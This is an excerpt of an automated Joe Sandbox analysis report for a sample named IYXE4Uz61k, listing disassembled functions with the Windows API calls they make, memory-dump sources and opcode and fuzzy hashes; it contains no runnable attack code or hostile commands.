                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: 4697c418a94d1856d06abf5ccec05a6363ff1c783793ce473a35e30e5dc571c6
                                                                                                                                                                                                    • Instruction ID: 08b5f1efa843198f4cd78ab2422e7112e126fdae293d06d21c0a1a1a47f4f3b8
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4697c418a94d1856d06abf5ccec05a6363ff1c783793ce473a35e30e5dc571c6
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 17A011C22A800ABC3008B2A22C02C3B020CE0C2B28330882EF822C0880B88008000A32
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0088E580
                                                                                                                                                                                                      • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
                                                                                                                                                                                                      • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1269201914-0
                                                                                                                                                                                                    • Opcode ID: fc1d69bf7da90eec6d6afbae37d1a10af1a575454ab6438050f983e1d17965c2
                                                                                                                                                                                                    • Instruction ID: 08b5f1efa843198f4cd78ab2422e7112e126fdae293d06d21c0a1a1a47f4f3b8
                                                                                                                                                                                                    • Opcode Fuzzy Hash: fc1d69bf7da90eec6d6afbae37d1a10af1a575454ab6438050f983e1d17965c2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 17A011C22A800ABC3008B2A22C02C3B020CE0C2B28330882EF822C0880B88008000A32
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 0088E51F
                                                                                                                                                                                                      • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
                                                                                                                                                                                                      • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 695b4d358fff0dcfcdebb64ebedcce698e9d6b6ee5d7944b84d24e7056c387f6
• Instruction ID: 18f7b86ca2e2add0118aa0352b4b934aaf3e636a120056cc1a82c3caf365ae1c
• Opcode Fuzzy Hash: 695b4d358fff0dcfcdebb64ebedcce698e9d6b6ee5d7944b84d24e7056c387f6
• Instruction Fuzzy Hash: BDA001D66A954ABC3108B6596D06C3F161DE4D6F69370992EF826C4981A8841C451A72
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0088E51F
  • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
  • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: cd7af1c07843dd5d021b8357e428a80251ce82dd57e1567bd1586a112f0c3f40
• Instruction ID: 18f7b86ca2e2add0118aa0352b4b934aaf3e636a120056cc1a82c3caf365ae1c
• Opcode Fuzzy Hash: cd7af1c07843dd5d021b8357e428a80251ce82dd57e1567bd1586a112f0c3f40
• Instruction Fuzzy Hash: BDA001D66A954ABC3108B6596D06C3F161DE4D6F69370992EF826C4981A8841C451A72
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0088E51F
  • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
  • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: f675508366261f7848b136dda8ee3500d24efa8c22ca95513995af84f9516d92
• Instruction ID: 18f7b86ca2e2add0118aa0352b4b934aaf3e636a120056cc1a82c3caf365ae1c
• Opcode Fuzzy Hash: f675508366261f7848b136dda8ee3500d24efa8c22ca95513995af84f9516d92
• Instruction Fuzzy Hash: BDA001D66A954ABC3108B6596D06C3F161DE4D6F69370992EF826C4981A8841C451A72
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0088E51F
  • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
  • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 328bd15253375a79b5be8f5b58a9cb0bbdaffe401afb902de41bc4d3c9747d9e
• Instruction ID: 18f7b86ca2e2add0118aa0352b4b934aaf3e636a120056cc1a82c3caf365ae1c
• Opcode Fuzzy Hash: 328bd15253375a79b5be8f5b58a9cb0bbdaffe401afb902de41bc4d3c9747d9e
• Instruction Fuzzy Hash: BDA001D66A954ABC3108B6596D06C3F161DE4D6F69370992EF826C4981A8841C451A72
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 0088E580
  • Part of subcall function 0088E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0088E8D0
  • Part of subcall function 0088E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0088E8E1
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: d2935c6b254e91be69ad76af480a3f1a65b73fd68d6d87307048b818813fc9bf
• Instruction ID: 7272915de2681645c46693dd9ee1209591b06d1e1c676bc7621918f54e59f3ee
• Opcode Fuzzy Hash: d2935c6b254e91be69ad76af480a3f1a65b73fd68d6d87307048b818813fc9bf
• Instruction Fuzzy Hash: BDA011C22A80083C3008B2A22C02C3B020CE0E2B2A330822EF820C0880B88008000A32
APIs
• SetEndOfFile.KERNELBASE(?,0087903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00879F0C
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: File
• String ID:
• API String ID: 749574446-0
• Opcode ID: efa1160ae57f2d86a65bd12167e44a43e0a6f5b4c4767d1b34b6076369628c48
• Instruction ID: 06aedd556372d9fff6b186160066bf26b1d8bcbcf39e0b2d4d0e7157901f3f07
• Opcode Fuzzy Hash: efa1160ae57f2d86a65bd12167e44a43e0a6f5b4c4767d1b34b6076369628c48
• Instruction Fuzzy Hash: A8A0243004040D47DD001730CD0400C7710F7117C030051D47007CF471C7134407C700
APIs
• SetCurrentDirectoryW.KERNELBASE(?,0088AE72,C:\Users\user\Desktop,00000000,008B946A,00000006), ref: 0088AC08
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: CurrentDirectory
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1611563598-0
                                                                                                                                                                                                    • Opcode ID: d7ca231b6534acbaad32e7679b29081b36010aa4c5cd7f6288b31a9b6600b2a4
                                                                                                                                                                                                    • Instruction ID: 4f33071a97c365bcded9bab8e976fbec94e6a5449287108301bc07b3ffaf4e00
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d7ca231b6534acbaad32e7679b29081b36010aa4c5cd7f6288b31a9b6600b2a4
                                                                                                                                                                                                    • Instruction Fuzzy Hash: DFA011302002008BA2000B328F0AA0EBAAABFA2B00F00C028B00080030CB30C820BA00
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CloseHandle.KERNELBASE(000000FF,?,?,008795D6,?,?,?,?,?,008A2641,000000FF), ref: 0087963B
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CloseHandle
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2962429428-0
                                                                                                                                                                                                    • Opcode ID: 414f3f4c71cd33397467fe36667d59c1b55c8c34832ead59fd1c98d68fa3dd62
                                                                                                                                                                                                    • Instruction ID: deb3cba768e55de2b9328526ea3b5b9901d067972b2c373742791e5d2c23ae44
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 414f3f4c71cd33397467fe36667d59c1b55c8c34832ead59fd1c98d68fa3dd62
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 46F08970485B159FDB318A64C458792B7E8FB23331F149B5ED0EBC29F4D761E68D8A40
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 00871316: GetDlgItem.USER32(00000000,00003021), ref: 0087135A
                                                                                                                                                                                                      • Part of subcall function 00871316: SetWindowTextW.USER32(00000000,008A35F4), ref: 00871370
                                                                                                                                                                                                    • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0088C2B1
                                                                                                                                                                                                    • EndDialog.USER32(?,00000006), ref: 0088C2C4
                                                                                                                                                                                                    • GetDlgItem.USER32(?,0000006C), ref: 0088C2E0
                                                                                                                                                                                                    • SetFocus.USER32(00000000), ref: 0088C2E7
                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,00000065,?), ref: 0088C321
                                                                                                                                                                                                    • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0088C358
                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0088C36E
                                                                                                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0088C38C
                                                                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0088C39C
                                                                                                                                                                                                    • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0088C3B8
                                                                                                                                                                                                    • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0088C3D4
                                                                                                                                                                                                    • _swprintf.LIBCMT ref: 0088C404
                                                                                                                                                                                                      • Part of subcall function 00874092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008740A5
                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,0000006A,?), ref: 0088C417
                                                                                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0088C41E
                                                                                                                                                                                                    • _swprintf.LIBCMT ref: 0088C477
                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,00000068,?), ref: 0088C48A
                                                                                                                                                                                                    • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0088C4A7
                                                                                                                                                                                                    • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0088C4C7
                                                                                                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 0088C4D7
                                                                                                                                                                                                    • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0088C4F1
                                                                                                                                                                                                    • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0088C509
                                                                                                                                                                                                    • _swprintf.LIBCMT ref: 0088C535
                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,0000006B,?), ref: 0088C548
                                                                                                                                                                                                    • _swprintf.LIBCMT ref: 0088C59C
                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,00000069,?), ref: 0088C5AF
                                                                                                                                                                                                      • Part of subcall function 0088AF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0088AF35
                                                                                                                                                                                                      • Part of subcall function 0088AF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,008AE72C,?,?), ref: 0088AF84
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                                                                                                                                                                    • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                                                                                                                                                                    • API String ID: 797121971-1840816070
                                                                                                                                                                                                    • Opcode ID: bc76ca90745225a7d17cb692478a3cb5335e416fe6fbc878ba0047ad76c4a144
                                                                                                                                                                                                    • Instruction ID: bb61c5eeaec92a7f9623bff44984e6f239a03474a7689ba9699b8f7bb0568772
                                                                                                                                                                                                    • Opcode Fuzzy Hash: bc76ca90745225a7d17cb692478a3cb5335e416fe6fbc878ba0047ad76c4a144
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F4919272248348BBE621EBA4CC49FFB77ACFB4A700F004919B649D6085D775EA048B73
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog.LIBCMT ref: 00876FAA
                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00877013
                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00877084
                                                                                                                                                                                                      • Part of subcall function 00877A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00877AAB
                                                                                                                                                                                                      • Part of subcall function 00877A9C: GetLastError.KERNEL32 ref: 00877AF1
                                                                                                                                                                                                      • Part of subcall function 00877A9C: CloseHandle.KERNEL32(?), ref: 00877B00
                                                                                                                                                                                                      • Part of subcall function 0087A1E0: DeleteFileW.KERNELBASE(000000FF,?,?,0087977F,?,?,008795CF,?,?,?,?,?,008A2641,000000FF), ref: 0087A1F1
                                                                                                                                                                                                      • Part of subcall function 0087A1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,0087977F,?,?,008795CF,?,?,?,?,?,008A2641), ref: 0087A21F
                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00877139
                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00877155
                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00877298
                                                                                                                                                                                                      • Part of subcall function 00879DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,008773BC,?,?,?,00000000), ref: 00879DBC
                                                                                                                                                                                                      • Part of subcall function 00879DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00879E70
                                                                                                                                                                                                      • Part of subcall function 00879620: CloseHandle.KERNELBASE(000000FF,?,?,008795D6,?,?,?,?,?,008A2641,000000FF), ref: 0087963B
                                                                                                                                                                                                      • Part of subcall function 0087A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0087A325,?,?,?,0087A175,?,00000001,00000000,?,?), ref: 0087A501
                                                                                                                                                                                                      • Part of subcall function 0087A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0087A325,?,?,?,0087A175,?,00000001,00000000,?,?), ref: 0087A532
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
• String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
• API String ID: 3983180755-3508440684
• Opcode ID: b21597edecdaadb71030bbffaf46b10a8c6969a873f49a4bb2473e17374cde99
• Instruction ID: d093fb2eb464f53a5193d5bb6f8b00cfb17bd4979cebd0f6ac45152ea215a075
• Opcode Fuzzy Hash: b21597edecdaadb71030bbffaf46b10a8c6969a873f49a4bb2473e17374cde99
• Instruction Fuzzy Hash: B9C10C71904644AAEB25EB78CC81FEEB3A8FF04300F408559F55EE7246E734EA44CB62
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: __floor_pentium4
• String ID: 1#IND$1#INF$1#QNAN$1#SNAN
• API String ID: 4168288129-2761157908
• Opcode ID: 72199bb5830451905cb238c384ab2a225747315ff4a0c9825e5b610837aa4568
• Instruction ID: 675e181f92e1a063f43dd03ca71552e9b7e38ed0b8a13e23b7a3b613841d5dcb
• Opcode Fuzzy Hash: 72199bb5830451905cb238c384ab2a225747315ff4a0c9825e5b610837aa4568
• Instruction Fuzzy Hash: 65C23771E086288FDF25EE289D407EABBB5FB44315F1841EAD44EE7241E775AE818F40
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743983319.00000000008D3000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_870000_IYXE4Uz61k.jbxd
Similarity
• API ID: H_prolog_swprintf
• String ID: CMT$h%u$hc%u
• API String ID: 146138363-3282847064
• Opcode ID: 747b8fbc1840a07a953ba599607ff614241523c9b285872cc5ef437256333386
• Instruction ID: d06e2990b6cec6effc8a8c3dbe50766965390f024de3c0e95df6c2878748e89b
• Opcode Fuzzy Hash: 747b8fbc1840a07a953ba599607ff614241523c9b285872cc5ef437256333386
• Instruction Fuzzy Hash: 2E32D2715102849BDB18DF78C895AE93BA5FF55300F04847DFD8ECB28ADA70D649CB22
APIs
• __EH_prolog.LIBCMT ref: 00872874
• _strlen.LIBCMT ref: 00872E3F
  • Part of subcall function 008802BA: __EH_prolog.LIBCMT ref: 008802BF
  • Part of subcall function 00881B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0087BAE9,00000000,?,?,?,00010464), ref: 00881BA0
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00872F91
Strings
Memory Dump Source
• Source File: 00000000.00000002.1743841448.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
• Associated: 00000000.00000002.1743825945.0000000000870000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743871495.00000000008A3000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008AE000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008B5000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1743888388.00000000008D2000.00000004.00000001.01000000.00000003.sdmp
